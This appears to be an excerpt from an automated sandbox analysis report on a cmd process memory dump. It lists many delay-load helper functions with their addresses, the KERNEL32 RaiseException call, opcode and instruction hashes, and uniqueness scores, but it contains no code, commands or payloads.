Instruction Fuzzy Hash: 6EB012D53AF1057C7004D1075D06DFF215CC0C0A10320845AFC04CD000D9406D850031

Uniqueness

Uniqueness Score: -1.00%

Function 03054C70, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 31b856697f369031bc06985838e45c11abdc75dba990f11cda1d1a4192dfc2b3
Instruction ID: 1f3d8ebc4ab369413b507fb15b9abf366f0ad0d5c33503cd14b5252ad3f6a8b5
Opcode Fuzzy Hash: 31b856697f369031bc06985838e45c11abdc75dba990f11cda1d1a4192dfc2b3
Instruction Fuzzy Hash: CFB012D53AF1057CB004D1075C06DFF215CC0C0A10320C81AFC04CD000D9406D840031

Uniqueness

Uniqueness Score: -1.00%

Function 03054C84, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 9d28860a1fee7a50a26d5618ecef30be4037573657358ba3eb1c6c00c995d45b
Instruction ID: 56142ed44b5fe28d5d7f455f9428c44e9bdedef40fd7102927ce42b4915cfd94
Opcode Fuzzy Hash: 9d28860a1fee7a50a26d5618ecef30be4037573657358ba3eb1c6c00c995d45b
Instruction Fuzzy Hash: 13B012D53AF1097D7004D1075D06DFF215CC8C0910320844AFC04CD001D9405D850031

Uniqueness

Uniqueness Score: -1.00%

Function 03054CB6, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: f04848d295c359a23a3c1ad08eec3480b367eb978e8e9efcaae5c8c3d1919f63
Instruction ID: b64e70780c82f1a699fb15c2535e26e438f181bf1f8a2af8d9603bc9394200e5
Opcode Fuzzy Hash: f04848d295c359a23a3c1ad08eec3480b367eb978e8e9efcaae5c8c3d1919f63
Instruction Fuzzy Hash: 07B012D53AF2057C7004D2075D07DFF215CC0C0910360850AFC04CD000D9405DC40131

Uniqueness

Uniqueness Score: -1.00%

Function 03054816, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054808

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 1f0d549eee6453cacdb6777b1b8f8401bb8703af03c64580aa9a1e2895d36f97
Instruction ID: 3f14d65523becea84a5f7b78efa6f9b0e3f6c1515952de311451656da35c64f9
Opcode Fuzzy Hash: 1f0d549eee6453cacdb6777b1b8f8401bb8703af03c64580aa9a1e2895d36f97
Instruction Fuzzy Hash: D5A001DA2AF24ABD7208E6527D4ACFF121CC4C5A623759A1AFC16C9051A9801D895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054F01, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 2ec1ef29f7dbb94803db6ca4ea5d1a81c3abea4287c343feb8e458a99dfdab5d
Instruction ID: 56dee4796d716a80e090b0a629e05995cf1bd4b19b52ffa96f1f9423d6f6f90c
Opcode Fuzzy Hash: 2ec1ef29f7dbb94803db6ca4ea5d1a81c3abea4287c343feb8e458a99dfdab5d
Instruction Fuzzy Hash: 30A001DA2EF20AFC7208E2526D57DFF121CC4C4A653759E1AFC12D9051A9815D855471

Uniqueness

Uniqueness Score: -1.00%

Function 03054F0B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: b319b2ac45069d8e2710e80b05484ff6c4ecdf83a30e8bb911b43dbbf9a94442
Instruction ID: 56dee4796d716a80e090b0a629e05995cf1bd4b19b52ffa96f1f9423d6f6f90c
Opcode Fuzzy Hash: b319b2ac45069d8e2710e80b05484ff6c4ecdf83a30e8bb911b43dbbf9a94442
Instruction Fuzzy Hash: 30A001DA2EF20AFC7208E2526D57DFF121CC4C4A653759E1AFC12D9051A9815D855471

Uniqueness

Uniqueness Score: -1.00%

Function 03054F33, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 7e53adbb7e531fa3cf206c534043915fb962419b06084ffda9566ee077f2addd
Instruction ID: 56dee4796d716a80e090b0a629e05995cf1bd4b19b52ffa96f1f9423d6f6f90c
Opcode Fuzzy Hash: 7e53adbb7e531fa3cf206c534043915fb962419b06084ffda9566ee077f2addd
Instruction Fuzzy Hash: 30A001DA2EF20AFC7208E2526D57DFF121CC4C4A653759E1AFC12D9051A9815D855471

Uniqueness

Uniqueness Score: -1.00%

Function 03054F3D, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: bc0bfc95a34c902e68cafe6db8d1d25fa2434ffe43cdc3a154d4891671e5e681
Instruction ID: 56dee4796d716a80e090b0a629e05995cf1bd4b19b52ffa96f1f9423d6f6f90c
Opcode Fuzzy Hash: bc0bfc95a34c902e68cafe6db8d1d25fa2434ffe43cdc3a154d4891671e5e681
Instruction Fuzzy Hash: 30A001DA2EF20AFC7208E2526D57DFF121CC4C4A653759E1AFC12D9051A9815D855471

Uniqueness

Uniqueness Score: -1.00%

Function 03054F91, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054F83

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 369bc976d74298f9c976bcedb10844b26cf562ac53210328d01745f999bd1b54
Instruction ID: fac8555bad573d0c6fc384620bbe67de96f2e4e2fb42033784f27b63743f481b
Opcode Fuzzy Hash: 369bc976d74298f9c976bcedb10844b26cf562ac53210328d01745f999bd1b54
Instruction Fuzzy Hash: F1A001DA2AF20ABC7608E2576D1ACFF221CC4C5A65361991AFC12C9052AA8419855571

Uniqueness

Uniqueness Score: -1.00%

Function 03054F9B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054F83

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 6a70aebb80f7033b5660989ebbaa3883a7440cec61a9cc3dc2ee3b28c66e7d8f
Instruction ID: fac8555bad573d0c6fc384620bbe67de96f2e4e2fb42033784f27b63743f481b
Opcode Fuzzy Hash: 6a70aebb80f7033b5660989ebbaa3883a7440cec61a9cc3dc2ee3b28c66e7d8f
Instruction Fuzzy Hash: F1A001DA2AF20ABC7608E2576D1ACFF221CC4C5A65361991AFC12C9052AA8419855571

Uniqueness

Uniqueness Score: -1.00%

Function 030547FB, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054808

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: ae8b0862e3fa29353983ed734da4c10ac0e9d99848385c05d0b4eaa3611fbc96
Instruction ID: 01b6de4ec78773e798c204c9098f6d873af3e5db70cfb01ebd15836c0011b47b
Opcode Fuzzy Hash: ae8b0862e3fa29353983ed734da4c10ac0e9d99848385c05d0b4eaa3611fbc96
Instruction Fuzzy Hash: 8AA001EA2AB24ABD7208E6527D4ADFF121CC4C1A223759A2AFC15D9051A9802D895475

Uniqueness

Uniqueness Score: -1.00%

Function 03054EC8, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 864d7fad2588917f11b65e6a19e99a434ecbf20e76bda59759f1871bb2487e10
Instruction ID: cde80fbe0d5783bca9599f03aefc06d90bc61ae5797e1e86654eafd49599e636
Opcode Fuzzy Hash: 864d7fad2588917f11b65e6a19e99a434ecbf20e76bda59759f1871bb2487e10
Instruction Fuzzy Hash: 28A001DA2EB20ABC7208E2526D57DFF121CC4C0A253759A1AFC11E9051A9815D855471

Uniqueness

Uniqueness Score: -1.00%

Function 03054EE3, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 969200ed14db5248a172fd98738e5a543dd3495d9d2924f2988aecc8ce184296
Instruction ID: 56dee4796d716a80e090b0a629e05995cf1bd4b19b52ffa96f1f9423d6f6f90c
Opcode Fuzzy Hash: 969200ed14db5248a172fd98738e5a543dd3495d9d2924f2988aecc8ce184296
Instruction Fuzzy Hash: 30A001DA2EF20AFC7208E2526D57DFF121CC4C4A653759E1AFC12D9051A9815D855471

Uniqueness

Uniqueness Score: -1.00%

Function 03054EED, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: ca00be60647e703268d48e10087c6ff85b2392a1555376583b32f49606d44919
Instruction ID: 56dee4796d716a80e090b0a629e05995cf1bd4b19b52ffa96f1f9423d6f6f90c
Opcode Fuzzy Hash: ca00be60647e703268d48e10087c6ff85b2392a1555376583b32f49606d44919
Instruction Fuzzy Hash: 30A001DA2EF20AFC7208E2526D57DFF121CC4C4A653759E1AFC12D9051A9815D855471

Uniqueness

Uniqueness Score: -1.00%

Function 03054C1B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 2a961077de754e1288fad8c625057c789170cdfdc01d9f736136323aed78de17
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 2a961077de754e1288fad8c625057c789170cdfdc01d9f736136323aed78de17
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054C25, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: a8353e67357b1911568c60ea9b35811131f018841cf2d8c7e578f445dd07cfc7
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: a8353e67357b1911568c60ea9b35811131f018841cf2d8c7e578f445dd07cfc7
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054C2F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: c746eb90f7e52b50be0b219c3ef8197713717d73423215811bab949ddd63ee28
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: c746eb90f7e52b50be0b219c3ef8197713717d73423215811bab949ddd63ee28
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054C39, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 71dd14e628575a15643e7d16a7ab0677d54b77de9fab3679302025980f931a22
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 71dd14e628575a15643e7d16a7ab0677d54b77de9fab3679302025980f931a22
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054C43, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 2821b84af99297c4b9e8c5ad324cb14710f1c1994875ba511bad31209013b405
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 2821b84af99297c4b9e8c5ad324cb14710f1c1994875ba511bad31209013b405
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054C4D, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 6ff3b71ab2be569ec813653bbc6513cdb416d581571aebb42d2ce354db09de76
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 6ff3b71ab2be569ec813653bbc6513cdb416d581571aebb42d2ce354db09de76
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054C57, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 6c8b890af243263c8c0be2318989b29fee002fe6e9f242071df3d56b9eacf6b6
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 6c8b890af243263c8c0be2318989b29fee002fe6e9f242071df3d56b9eacf6b6
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054C6B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 177c01481721e16e3146816920417686e29273ac58967adf76aadba011e3fafc
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 177c01481721e16e3146816920417686e29273ac58967adf76aadba011e3fafc
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054C7F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 9a4b020d18a8e01787120f4d25cca724d4652599eaba630d02b411ecd2b69833
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 9a4b020d18a8e01787120f4d25cca724d4652599eaba630d02b411ecd2b69833
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054C93, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 82da41ababea083a285adc70fc996ef4fc1e23fda528ffe2bbeb4cf4c238a34b
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 82da41ababea083a285adc70fc996ef4fc1e23fda528ffe2bbeb4cf4c238a34b
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054C9D, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: d156f3c5b0acd804d812b3b7ca59d77d82143985f6655e6b4c4fbebd3a5128ae
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: d156f3c5b0acd804d812b3b7ca59d77d82143985f6655e6b4c4fbebd3a5128ae
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054CA7, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 2ba227f5ee249773568b9694c5508b2da7b0f9b2ea1dfcca5cea3df65f2085b6
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 2ba227f5ee249773568b9694c5508b2da7b0f9b2ea1dfcca5cea3df65f2085b6
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054CB1, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 75b47ac1f6f701ca031920a961e3515209077e50b448a5c73dac2f52a3c1e02a
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 75b47ac1f6f701ca031920a961e3515209077e50b448a5c73dac2f52a3c1e02a
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054CC5, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 34f2629decc8898cd0c903a1573656314bb8159e2a88985e118ad05abd0ad377
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 34f2629decc8898cd0c903a1573656314bb8159e2a88985e118ad05abd0ad377
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

